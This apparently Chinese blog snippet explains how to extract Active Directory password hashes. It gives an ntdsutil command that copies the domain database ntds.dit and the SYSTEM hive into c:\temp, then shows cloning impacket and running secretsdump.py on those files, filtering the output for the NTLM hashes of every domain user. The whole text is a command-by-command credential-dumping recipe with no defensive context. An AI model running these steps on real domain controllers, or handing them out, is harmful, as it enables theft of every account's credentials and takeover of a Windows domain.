Win Server一般内置了ntdsutil工具
直接输入指令:
ntdsutil "ac i ntds" "ifm" "create full c:\temp" q q
输出到temp目录下
利用impacket解析两个文件:
git clone https://github.com/SecureAuthCorp/impacket
~/Desktop/impacket/examples$ ./secretsdump.py -system /root/Desktop/SYSTEM -ntds /root/Desktop/ntds.dit -user-status LOCAL >/root/Desktop/craked
less /root/Desktop/craked |grep ":::"
可得到域中用户的ntlm hash
网友评论